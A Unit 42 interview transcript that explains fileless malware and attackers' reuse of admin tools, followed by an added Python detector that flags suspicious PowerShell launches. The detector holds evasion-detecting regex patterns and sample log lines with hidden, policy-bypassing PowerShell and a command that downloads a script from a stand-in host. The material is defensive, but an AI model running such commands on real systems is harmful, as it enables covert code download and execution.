What Are Fileless Malware Attacks and “Living Off the Land”? Unit 42 Explains
Fileless malware and “living off the land” have been around for a while, but they have seen a resurgence in recent months. What’s behind this growing popularity? Jen Miller Osborn, deputy director of Threat Intelligence for Unit 42®, explains what fileless malware attacks are and why “living off the land” is so attractive for malicious actors.
Read the full transcript below.
Jen Miller Osborn: So, I wanted to take a second to talk about two things that are very much in the news lately. And those are things called fileless malware attacks and "living off the land."
Fileless malware attacks are something where attackers are using things that aren't written to disk. So, things that are staying in volatile memory, such as PowerShell and WMI. And they're doing that because they are much harder to both detect and to find later, because a lot of times, they aren't kept in logs.
So, you'll see attackers doing things where they're automating a lot of their initial attacks, where they'll use something such as PowerShell or WMI to figure out both where they've landed in the system and do some basic network reconnaissance to decide whether or not they are in a place where they want to be. And those things are very hard to detect via traditional AV vendors, and even without some behavior analytics, they're harder to find.
And then, along with that, to also avoid detection, we're seeing attackers more and more moving toward a thing that's called "living off the land," which is where they're repurposing things that are typically legitimate admin tools, whether Windows or Macintosh or Linux or whatever. And they're tools that admins will use to monitor their environment, to dump credentials, to kind of figure out what's going on. But now, you have attackers using those same tools, which, in a lot of cases, are whitelisted because these are legitimate tools that system admins use.
But, you're seeing attackers repurposing them now, where they're using them to basically accomplish the same things that a lot of sysadmins do – to determine where they are, to do some network administration, to do some account administration, and checking on hashes. But they're using them maliciously, which is much harder to detect because, as a basic network posture, those things are going to be whitelisted.
So, those are two ways that attackers now are moving into spaces that are, A, hard to detect, and B, require a lot more behavioral analytics. Because there are a lot of things that you'll typically see legitimate system admins use but you're seeing attackers use. Because instead of using malware or using something such as Mimikatz, which is a known tool, which a lot of people will flag, now they're using tools where they’re going to be whitelisted.
And they’re probably – if they're not already present on a network for legitimate purposes, you'll see, a lot of times, attackers will bring them down because they're aware that these are legitimate tools and that they’re probably whitelisted. You aren't going to detect them maliciously unless you're running additional behavioral analytics that will show you them being used in a way that the sysadmin would not be using them.
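The behavioral analytics Jen describes can be illustrated with a small detector that scores Windows process-creation records for the two patterns in the video: a script host launched by a parent that an administrator would not normally use, and PowerShell command-line traits that favour memory-only execution. This is an added example, not code from Unit 42 or Palo Alto Networks; the record format, field names and the sample log lines are constructed assumptions modelled loosely on Sysmon Event ID 1, not a real log schema.

```python
# Added example (not from the Unit 42 video): behavioral scoring of constructed
# process-creation records to surface "living off the land" use of PowerShell/WMI.
import re
from dataclasses import dataclass

@dataclass
class ProcEvent:
    parent: str   # parent image name, lower-cased
    image: str    # child image name, lower-cased
    cmdline: str  # full command line as logged
    user: str     # account that launched the process

# Parents that should not normally spawn a script host (assumed baseline for this example).
SUSPICIOUS_PARENTS = {"winword.exe", "excel.exe", "outlook.exe", "wmiprvse.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe"}

# Command-line traits commonly associated with fileless execution or evasion.
CMD_PATTERNS = {
    "encoded_command": re.compile(r"-e(nc(odedcommand)?)?\s+[A-Za-z0-9+/=]{20,}", re.I),
    "hidden_window":   re.compile(r"-w(indowstyle)?\s+hidden", re.I),
    "download_cradle": re.compile(r"\b(downloadstring|downloadfile|invoke-webrequest|iwr)\b", re.I),
    "bypass_policy":   re.compile(r"-e(x(ecutionpolicy)?|p)\s+bypass", re.I),
}

def score_event(ev: ProcEvent) -> list[str]:
    """Return the behavioral reasons an event looks suspicious (empty list if none)."""
    reasons = []
    if ev.image in SCRIPT_HOSTS and ev.parent in SUSPICIOUS_PARENTS:
        reasons.append(f"{ev.parent} spawned {ev.image}")
    for name, pattern in CMD_PATTERNS.items():
        if pattern.search(ev.cmdline):
            reasons.append(name)
    return reasons

def parse_line(line: str) -> ProcEvent:
    """Parse a constructed 'key=value|key=value' record (assumed format, not Sysmon's own)."""
    kv = dict(part.split("=", 1) for part in line.strip().split("|"))
    return ProcEvent(kv["parent"].lower(), kv["image"].lower(), kv["cmdline"], kv["user"])

# Constructed sample records: one routine admin action and two living-off-the-land patterns.
# The base64 blob is a placeholder (repeated 'A'), not a real encoded script.
SAMPLE_LOG = [
    "parent=explorer.exe|image=powershell.exe|cmdline=powershell.exe Get-Service -Name Spooler|user=CORP\\admin",
    "parent=winword.exe|image=powershell.exe|cmdline=powershell.exe -w hidden -ep bypass -enc QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB|user=CORP\\jdoe",
    "parent=wmiprvse.exe|image=powershell.exe|cmdline=powershell.exe Invoke-WebRequest http://example.invalid/a -OutFile C:\\Users\\Public\\x.ps1|user=NT AUTHORITY\\SYSTEM",
]

def detect(lines: list[str]) -> dict[str, list[str]]:
    """Map each suspicious command line to its reasons; records with no findings are omitted."""
    return {ev.cmdline: r for ev in map(parse_line, lines) if (r := score_event(ev))}

if __name__ == "__main__":
    for cmd, why in detect(SAMPLE_LOG).items():
        print(f"ALERT {why}: {cmd}")
```

The benign record is dropped because nothing about it departs from normal admin behaviour; the other two are flagged on parent-child relationship and command-line traits rather than on any file hash, which is the point of the transcript.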